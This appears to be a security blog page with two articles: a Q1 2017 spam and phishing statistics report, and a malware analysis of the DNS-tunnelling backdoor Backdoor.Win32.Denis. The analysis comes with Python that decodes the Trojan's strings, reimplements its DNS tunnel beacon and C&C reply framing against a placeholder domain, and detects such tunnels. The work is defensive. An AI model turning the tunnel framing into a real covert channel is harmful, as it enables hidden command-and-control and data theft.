In Q1 2017, the share of small emails (up to 2 KB) in spam traffic decreased considerably and averaged 29.17%, which is 12.93 p.p. less than in the fourth quarter of 2016. The proportion of emails sized 2–5 KB (3.74%) and 5–10 KB (7.83%) also continued to decline.

Meanwhile, the proportion of emails sized 10-20 KB (25.61%) and 20-50 KB (28.04%) increased. Last year’s trend of fewer super-short spam emails and more average-sized emails has continued into 2017.

Malicious attachments in email

Top 10 malware families

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

TOP 10 malware families in Q1 2017

The Backdoor.Java.Adwind family (2.36%) in fifth place is a cross-platform multifunctional backdoor written in Java and sold on DarkNet as malware-as-a-service (MaaS). It is also known under the names of AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is typically distributed via email as a JAR attachment.

A newcomer – Trojan-Downloader.MSWord.Cryptoload (1.27%) – occupied ninth place. It’s a JS script containing malware, which it installs and runs on the computer.

Trojan-Downloader.VBS.Agent (1.26%) rounded off the Top 10.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q1 2017

In Q1 2017, China (18.23%) was the country targeted most by malicious mailshots. Germany, last year’s leader, came second (11.86%), followed by the UK (8.16%) in third.

Italy (7.87%), Brazil (6.04%) and Japan (4.04%) came next, with Russia occupying seventh place with a share of 3.93%. The US was in ninth place (2.46%), while Vietnam (1.94%) completed the Top 10.


Phishing

In the first quarter of 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. Overall, 9.31% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q1 2017.

Geography of attacks

China (20.88%) remained the country where the largest percentage of users is affected by phishing attacks, although its share decreased by 1.67 p.p.

Geography of phishing attacks*, Q1 2017

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 0.8 p.p. and amounted to 19.16%, placing the country second in this ranking. Macao added 0.91 p.p. to the previous quarter’s figure and came third with 11.94%. Russia came fourth with 11.29% (+0.73 p.p.), followed by Australia on 10.73% (-0.37 p.p.).

TOP 10 countries by percentage of users attacked

Country        %
China          20.87%
Brazil         19.16%
Macao          11.94%
Russia         11.29%
Australia      10.73%
Argentina      10.42%
New Zealand    10.18%
Qatar           9.87%
Kazakhstan      9.61%
Taiwan          9.27%

Argentina (10.42%, +1.78 p.p.), New Zealand (10.18%), Qatar (9.87%), Kazakhstan (9.61%) and Taiwan (9.27%) completed the top 10.

Organizations under attack

Rating the categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2017, the ‘Banks’ (25.82%, -0.53 p.p.), ‘Payment systems’ (13.6%, +2.23 p.p.) and ‘Online stores’ (10.89%, +0.48 p.p.) categories accounted for more than half of all registered attacks. The total share of ‘Financial organizations’ was a little over 50% of all phishing attacks.

Distribution of organizations affected by phishing attacks by category, Q1 2017

In addition to financial organizations, phishers most often targeted ‘Global Internet portals’ (19.1%), although their share decreased by 5.25 p.p. from the previous quarter. ‘Social networking sites’ (9.56%) and ‘Telecommunication companies’ (5.93%) also saw their shares fall by 0.32 p.p. and 0.83 p.p. respectively. The percentage of the ‘Online games’ category accounted for 1.65% while the figure for ‘Instant messaging’ was 1.53%.

TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component are for phishing pages using the names of fewer than 15 companies.

In Q1 2017, Kaspersky Lab products blocked 51 million attempts to open a phishing page.


The TOP 3 organizations attacked most frequently by phishers remained unchanged for the second quarter in a row. Yahoo! was once again the organization whose brand was mentioned most often on phishing pages (7.57%, -1.16 p.p.). Facebook (7.24%), whose share fell by 0.13 p.p., was second, while Microsoft (5.39%, -0.83 p.p.) came third.

Organization             % of detected phishing links
Yahoo!                   7.57
Facebook                 7.24
Microsoft Corporation    5.39

In order to reach the widest possible audience with one attack, scammers often mention a variety of brands expecting the victims to react to at least one of them. This is facilitated by authentication with existing accounts, which many Internet services use trying to make life easier for their users. Therefore, a page offering to use different accounts to enter a site does not arouse suspicions. This allows fraudsters to steal user data from several different resources using just one phishing page.

Phishing page prompting the user to login via the accounts of other web resources to access a file

This phishing page uses a similar trick under the pretext of accessing the Google Drive service

Hot topics this quarter

Payment systems

In Q1 2017, 13.6% of detections of Kaspersky Lab’s heuristic anti-phishing component fell under the ‘Payment Systems’ category, i.e. roughly one attack in seven targeted this category, which has been popular with phishers for several quarters now.

PayPal (28.25%) came first on the list of attacked payment systems, followed by Visa (25.78%) and American Express (24.38%).

Organization               %*
PayPal                     28.25
Visa Inc.                  25.78
American Express           24.38
MasterCard International   16.66
Others                      4.94

* The percentage of attacks on an organization as a total of all attacks on organizations from the ‘Payment Systems’ category

The goal of phishers attacking customers of popular payment systems is to get personal and payment data, login details for accounts, etc. Criminals often place fraudulent content on reputable resources in order to gain the trust of the user and bypass blacklisting. For example, we came across a fake PayPal support page located on the Google Sites service (the primary domain is After clicking on the banner, the user is redirected to a phishing page, where they are asked to enter their account data for the payment system.

Phishing page using the PayPal brand located on the Google domain

Another trick used by phishers is to place phishing content on the servers of government agencies. This is possible because a significant number of government agencies do not pay much attention to the security of their web resources.

Phishing page using the PayPal brand located on a server belonging to the Sri Lankan government

Phishing page using the PayPal brand located on a server belonging to the Bangladesh government

Emails threatening to block an account or asking to update data in a payment system were used as bait.

Online stores

Every tenth phishing attack targeted users of online stores. In Q1 2017, Amazon (39.13%) was the most popular brand with phishers.

Organization               %
Amazon (Online Shopping)   39.13
Apple                      15.43
Steam                       6.50
eBay                        5.15
Alibaba Group               2.87
Taobao                      2.54
Other targets              28.38

By using the Amazon brand, cybercriminals are trying not only to steal login data but also all the personal information of the user, including their bank card details. Also, they often place fake pages on domains that have a good reputation (for example, on a domain owned by Vodafone).

Phishing page using the Amazon brand located on the Vodafone domain

Earning money with anti-phishing

In addition to standard phishing emails and pages, we often come across other methods of tricking users. Scammers often exploit people’s desire to make easy money by offering cash to view advertising, automatic stock trading programs and much more.

Spam emails offering quick money on the Internet

In the first quarter of 2017, we saw a rather interesting fraudulent resource which claimed to be combating phishing sites. All you had to do if you wanted to make some quick cash was to register and perform several tasks, the essence of which was to evaluate web pages using the following options: malicious, safe, does not load. Only the content of the page was evaluated, while its address was not displayed.

After checking 31 sites, it turned out that $7 needed to be paid to withdraw the money that was earned

For each ‘checked’ site, the user earned about $3. To withdraw that money, they had to transfer $7 to the owners of the resource as confirmation that they were an adult and financially solvent. Of course, no ‘earnings’ were ever received after that.


Although the beginning of Q1 2017 was marked by a decline in the amount of spam in overall global email traffic, in March the situation became more stable, and the average share of spam for the quarter amounted to 55.9%. The US (18.75%) remained the biggest source of spam, followed by Vietnam (7.86%) and China (7.77%).

The first quarter of 2017 was also notable for the decrease in the volume of malicious spam sent from the Necurs botnet: the number of such mass mailings decreased significantly compared to the previous reporting period. However, the lull may be temporary: the attackers may have decided to suspend mass mailings until all the hype about encryptors subsides.

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families detected in email. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

In Q1 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. China (20.88%) topped the rating of countries most often attacked by phishers. Financial organizations remained the main target for phishers, and we expect this trend to continue in the future.

Use of DNS Tunneling for C&C Communications

Fri, 04/28/2017 - 05:59

Say my name!

You are goddamn right.

Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we omit these two and look at the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or swap the mouse buttons.

Malware has come a long way since the Morris worm, and the authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take analysts weeks or even months to decipher. Others go back to basics and use IRC servers as a management host, as we saw in the recent case of Mirai and its numerous clones.

Often, virus writers don’t even bother to encrypt or otherwise mask their communications: instructions and related information are sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of unskilled cybercriminals, and even of experienced programmers who have little experience developing malware.

However, you do get the occasional off-the-wall approaches that don’t fall into either of the above categories. Take, for instance, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with the C&C server.

The malicious program in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan enables an intruder to manipulate the file system, run arbitrary commands and run loadable modules.


Like many Trojans before it, Backdoor.Win32.Denis obtains the addresses of the API functions it needs from loaded DLLs at run time. However, instead of hashing the names in the export table and comparing hashes (the more common approach), this Trojan simply compares the export names against its own list of API names. That list is stored in a trivially ‘encrypted’ form: every byte of a function name differs from the plaintext by 128, and the bot restores it by subtracting 128 from each byte.

It should be noted that the bot uses two versions of encryption: for API call names and the strings required for it to operate, it does the subtraction from every byte; for DLLs, it subtracts from every other byte. To load DLLs using their names, LoadLibraryW is used, meaning wide strings are required.

‘Decrypting’ strings in the Trojan

Names of API functions and libraries in encrypted format

It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to extracted functions alternate with references to functions received from the loader.
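As an added example, here is the deobfuscation described above written out in Python. This is not code from the write-up or from the Trojan; the sample ciphertexts, the stand-in export table and the addresses in it are constructed for the example. It also shows the two places this matters for an analyst: resolving APIs by plain name comparison rather than by hash, and a quick scanner that locates such strings in a binary blob using the fact that every obfuscated byte falls in 0x80..0xFF.

```python
"""Denis-style string deobfuscation, as an added example (not code from the
write-up or from the sample). Narrow strings: subtract 128 from every byte
(mod 256). DLL names are UTF-16LE, so only every other byte (the low byte of
each code unit) is adjusted. The ciphertexts and export table below are
constructed for the example."""
from __future__ import annotations
import string


def decode_narrow(blob: bytes) -> str:
    """ANSI string: subtract 128 from every byte. Mod 256 this is the same as
    XOR 0x80, so the operation is its own inverse."""
    return bytes((b - 128) & 0xFF for b in blob).decode("ascii")


def decode_wide(blob: bytes) -> str:
    """UTF-16LE string: only the low byte of each code unit is obfuscated; the
    high (zero) byte is left untouched, hence 'every other byte'."""
    out = bytearray(blob)
    for i in range(0, len(out), 2):
        out[i] = (out[i] - 128) & 0xFF
    return out.decode("utf-16-le")


def encode_narrow(text: str) -> bytes:
    """Inverse of decode_narrow; used here only to build sample data."""
    return bytes((b + 128) & 0xFF for b in text.encode("ascii"))


def encode_wide(text: str) -> bytes:
    """Inverse of decode_wide; used here only to build sample data."""
    raw = bytearray(text.encode("utf-16-le"))
    for i in range(0, len(raw), 2):
        raw[i] = (raw[i] + 128) & 0xFF
    return bytes(raw)


# Constructed stand-in for a DLL export table (name -> address); not real addresses.
FAKE_EXPORTS = {"LoadLibraryW": 0x7FFA0001, "GetTickCount": 0x7FFA0002,
                "CreateFileW": 0x7FFA0003}


def resolve_by_name(encoded_names: list[bytes], exports: dict[str, int]) -> dict[str, int]:
    """Denis compares the decoded API name against the export names directly
    instead of hashing them. Unknown names are skipped."""
    resolved = {}
    for enc in encoded_names:
        name = decode_narrow(enc)
        if name in exports:
            resolved[name] = exports[name]
    return resolved


PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")


def find_obfuscated_strings(data: bytes, min_len: int = 5) -> list[str]:
    """Triage helper: because the plaintext is ASCII (< 0x80), every obfuscated
    byte lands in 0x80..0xFF. Scan a blob for runs of such bytes that decode to
    printable text and return them decoded."""
    found, run = [], bytearray()
    for b in data + b"\x00":          # trailing sentinel flushes the last run
        if b >= 0x80 and (b - 128) in PRINTABLE:
            run.append(b)
        else:
            if len(run) >= min_len:
                found.append(decode_narrow(bytes(run)))
            run = bytearray()
    return found
```

The narrow and wide decoders share the same arithmetic; the only difference is the stride, which is why the bot keeps a separate routine for the wide names it passes to LoadLibraryW. The scanner is a triage aid, not a signature: any run of high-bit-set bytes that happens to decode to printable ASCII will match.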

C&C Communication

The principle behind a DNS tunnel can be summed up as: “If you don’t know, ask somebody else”. When a recursive DNS resolver receives a query for a name, it first looks in its own cache. If the name is not there, the resolver walks the DNS hierarchy (the root servers, then the servers for the top-level domain, then those for the second-level domain) until it reaches the name server that is authoritative for the domain in question, and forwards the query there.

Now suppose the attacker owns that domain and runs its authoritative name server. A query for a subdomain of it will not be found in any cache, because the bot makes every name unique, so each query ends up at the attacker’s server. That server is expected to return an IP address, but it can return an arbitrary string, including C&C instructions. Two consequences matter for defenders: the infected host never contacts the C&C directly (it only talks to its configured resolver), and the request travels inside the query name itself, in the labels to the left of the attacker’s domain.

Dump of Backdoor.Win32.Denis traffic

This is what Backdoor.Win32.Denis does. The DNS request is sent first to, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.

Here is the response:

DNS packet received in response to the first request

Obviously, the request sent to the C&C is Base64-encoded (encoding, not encryption: anyone who captures the query can decode it). The initial request is a sequence of zeros with the result of GetTickCount at the end. In response the bot receives its unique ID, which it then places at the start of every subsequent packet to identify itself.

The instruction number is sent in the fifth DWORD, if we count from the start of the section highlighted green in the diagram above. Next comes the size of the data received from C&C. The data, packed using zlib, begins immediately after that.

The unpacked C&C response

The first four bytes are the data size. All that comes next is the data, which may vary depending on the type of instruction. In this case, it’s the unique ID of the bot, as mentioned earlier. We should point out that the data in the packet is in big-endian format.

The bot ID (highlighted) is stated at the beginning of each request sent to the C&C

C&C Instructions

Altogether, the Trojan handles 16 instructions, although the instruction numbers are not contiguous: the highest is 20. Most of the instructions concern interaction with the file system of the attacked computer. There are also capabilities to enumerate open windows, call an arbitrary API and obtain brief information about the system. Let us look at the last of these in more detail, as it is the first instruction executed.

Complete list of C&C instructions

Information about the infected computer, sent to the C&C

As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the info stored in the registry branch Software\INSUFFICIENT\INSUFFICIENT.INI:

  • The time when that specific instruction was last executed. (On the first execution there is no stored value, so the current time from GetSystemTimeAsFileTime is used and written to the BounceTime registry value);
  • UsageCount from the same registry branch.

Information about the operating system and the environment is also sent. This info is obtained with the help of NetWkstaGetInfo.

The data is packed using zlib.

The DNS response prior to Base64 encoding

The fields in the response are as follows (only the section highlighted in red with data and size varies depending on the instruction):

  • Bot ID;
  • Size of the previous C&C response;
  • The third DWORD in the C&C response;
  • Always equals 1 for a response;
  • GetTickCount();
  • Size of data after the specified field;
  • Size of response;
  • Actual response.

After the registration stage is complete, the Trojan begins to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a series of empty queries and responses.
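The following added example (not the Trojan’s code or Kaspersky’s tooling) puts the two layouts described above, the C&C reply and the fields of the bot’s reply, into a small encoder/decoder pair so the exchange can be stepped through offline, registration included. It uses a placeholder zone, c2.example, instead of the real domain. The write-up does not say what occupies the DWORDs before the instruction number in the C&C reply, nor exactly which bytes are zlib-packed on the bot side, so the example assumes bot ID plus zero padding for the former and packs only the data field for the latter; both assumptions are marked in the code.

```python
"""Denis-style DNS tunnel framing, as an added example (not the Trojan's code).
It follows the field order given in the write-up: bot-side header DWORDs in
big-endian, a zlib-packed payload, Base64 in the query name, and a C&C reply
whose fifth DWORD is the instruction number followed by the data size and
zlib data. Assumptions: the C&C domain is a placeholder, the reply's first
four DWORDs are bot ID + zero padding, and only the bot's data field is
zlib-packed."""
from __future__ import annotations
import base64
import struct
import zlib

C2_DOMAIN = "c2.example"   # placeholder for the example, not the real C&C domain
MAX_LABEL = 63             # DNS label limit (RFC 1035)
MAX_NAME = 253             # practical limit for a full query name
INSTR_SLOT = 4             # instruction number is the fifth DWORD of the C&C reply


def build_beacon(bot_id: int, prev_resp_size: int, third_dword: int,
                 tick_count: int, data: bytes) -> str:
    """Bot -> C&C. Packs the eight fields listed in the write-up and returns the query name.
    Fields: bot ID; size of previous C&C reply; third DWORD of that reply; constant 1;
    GetTickCount(); size of everything after this field; size of data; data."""
    packed = zlib.compress(data)                     # assumption: the data field is zlib-packed
    tail = struct.pack(">I", len(packed)) + packed   # "size of response" + "actual response"
    head = struct.pack(">6I", bot_id, prev_resp_size, third_dword, 1, tick_count, len(tail))
    b64 = base64.b64encode(head + tail).decode("ascii")
    labels = [b64[i:i + MAX_LABEL] for i in range(0, len(b64), MAX_LABEL)]
    name = ".".join(labels + [C2_DOMAIN])
    if len(name) > MAX_NAME:
        raise ValueError("payload too large for one query; a tunnel must chunk across queries")
    return name


def parse_beacon(qname: str) -> dict:
    """C&C side: strip the zone, rejoin the Base64 labels, unpack the header, inflate the data."""
    suffix = "." + C2_DOMAIN
    if not qname.endswith(suffix):
        raise ValueError("query is not for the tunnel zone")
    raw = base64.b64decode(qname[:-len(suffix)].replace(".", ""))
    bot_id, prev_size, third, one, tick, rest_len = struct.unpack(">6I", raw[:24])
    if one != 1 or rest_len != len(raw) - 24:
        raise ValueError("malformed beacon header")
    (resp_size,) = struct.unpack(">I", raw[24:28])
    return {"bot_id": bot_id, "prev_size": prev_size, "third": third, "tick": tick,
            "data": zlib.decompress(raw[28:28 + resp_size])}


def build_c2_response(bot_id: int, instruction: int, data: bytes) -> bytes:
    """C&C -> bot reply body (before Base64). The unpacked form is '4-byte length + data'
    as the write-up describes; the leading bot ID and zero DWORDs are this example's assumption."""
    packed = zlib.compress(struct.pack(">I", len(data)) + data)
    head = struct.pack(">4I", bot_id, 0, 0, 0)
    return head + struct.pack(">II", instruction, len(packed)) + packed


def parse_c2_response(blob: bytes) -> tuple[int, int, bytes]:
    """Bot side: read the instruction (5th DWORD) and size, inflate, then honour the inner length."""
    off = INSTR_SLOT * 4
    instruction, size = struct.unpack(">II", blob[off:off + 8])
    inner = zlib.decompress(blob[off + 8:off + 8 + size])
    (data_len,) = struct.unpack(">I", inner[:4])
    data = inner[4:4 + data_len]
    if len(data) != data_len:
        raise ValueError("truncated payload")
    return struct.unpack(">I", blob[:4])[0], instruction, data


def registration_roundtrip(tick_count: int, assigned_id: int) -> tuple[int, int, int]:
    """Walks the first exchange: an all-zero beacon carrying only GetTickCount, a reply that
    hands out the bot ID, and a second beacon that now leads with that ID. Returns the bot ID
    seen in each of the three messages."""
    first = parse_beacon(build_beacon(0, 0, 0, tick_count, b""))
    reply = build_c2_response(assigned_id, 0, struct.pack(">I", assigned_id))
    bot_id, _instr, _data = parse_c2_response(reply)
    second = parse_beacon(build_beacon(bot_id, len(reply), 0, tick_count + 1, b"hostname=WS01"))
    return first["bot_id"], bot_id, second["bot_id"]
```

Stepping through registration_roundtrip() shows why the traffic dump above looks like a stream of short queries: after Base64 expansion and the 28-byte header, a single query name carries well under 200 bytes of payload, so anything larger (a directory listing, a file) has to be spread over many consecutive queries, and the empty keep-alive queries fill the gaps in between.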

Sequence of empty queries sent to the C&C


The use of DNS tunneling for C&C communication, as seen in Backdoor.Win32.Denis, is very rare, albeit not unique. A similar technique was previously used in some POS Trojans and in some APT tools (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this particular use of the DNS protocol is new on PCs. We expect this method to become increasingly popular with malware writers, and we will keep an eye on how it is implemented in malicious programs in future.
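As an added example for defenders (not from the write-up), the following Python applies a few detection heuristics that follow directly from the traffic described above: many queries for one registered domain, nearly every subdomain unique, and long Base64-looking labels with high entropy. The query records are constructed inline, and the registered-domain logic is a two-label approximation that should be replaced by the Public Suffix List in practice.

```python
"""Heuristic detector for Denis-like DNS tunnelling, as an added example (not
from the write-up). It groups queries by registered domain and flags domains
that receive many queries for long, almost-always-unique, high-entropy,
Base64-looking subdomains. The query records below are constructed for the
example; in practice feed it resolver logs or Zeek dns.log records."""
from __future__ import annotations
import base64
import hashlib
import math
import re
from collections import defaultdict

BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=]+$")


def shannon_entropy(s: str) -> float:
    """Bits per character; Base64 of random data approaches 6, ordinary hostnames sit well below."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def registered_domain(qname: str) -> str:
    """Approximation: last two labels. Production code should use the Public Suffix
    List (co.uk and friends), or unrelated names will be grouped together."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def subdomain_part(qname: str, reg: str) -> str:
    name = qname.rstrip(".").lower()
    return name[:-(len(reg) + 1)] if name != reg else ""


def score_domains(records, min_queries: int = 10, min_unique_ratio: float = 0.8,
                  min_len: int = 30, min_entropy: float = 3.0) -> dict[str, dict]:
    """records: iterable of (client_ip, qname). Returns the flagged registered domains
    together with the statistics that tripped the thresholds."""
    groups: dict[str, list[str]] = defaultdict(list)
    for _client, qname in records:
        reg = registered_domain(qname)
        sub = subdomain_part(qname, reg)
        if sub:
            groups[reg].append(sub)
    flagged = {}
    for reg, subs in groups.items():
        if len(subs) < min_queries:
            continue
        unique_ratio = len(set(subs)) / len(subs)
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        b64_like = sum(all(BASE64_LABEL.match(l) for l in s.split(".")) for s in subs) / len(subs)
        if unique_ratio >= min_unique_ratio and avg_len >= min_len and avg_entropy >= min_entropy:
            flagged[reg] = {"queries": len(subs), "unique_ratio": round(unique_ratio, 2),
                            "avg_len": round(avg_len, 1), "avg_entropy": round(avg_entropy, 2),
                            "base64_like": round(b64_like, 2)}
    return flagged


def constructed_records() -> list[tuple[str, str]]:
    """Sample traffic for the example: ordinary lookups, CDN-style short hashed labels
    (unique but short), and tunnel-style beacons (long, unique, Base64-looking)."""
    recs = []
    for i in range(12):
        recs.append(("10.0.0.5", ["www", "mail", "api"][i % 3] + ".example.com"))
    for i in range(12):
        recs.append(("10.0.0.6", hashlib.sha256(f"asset{i}".encode()).hexdigest()[:8] + ".cdn.example.net"))
    for i in range(20):
        label = base64.b64encode(hashlib.sha256(f"beacon{i}".encode()).digest()).decode("ascii")
        recs.append(("10.0.0.7", f"{label}.z.c2.example"))
    return recs


SAMPLE_RECORDS = constructed_records()
```

Two caveats follow from the write-up itself. The registration beacon is mostly zeros, which Base64 turns into a run of ‘A’ characters with low entropy, so the entropy test alone would miss the very first query; uniqueness and volume still catch it, and the idle loop of empty queries keeps the count climbing even when no instructions are issued. Conversely, CDNs and some telemetry services also generate many unique subdomains, so the length and entropy thresholds are what keep the false-positive rate down; tune them against your own baseline before alerting.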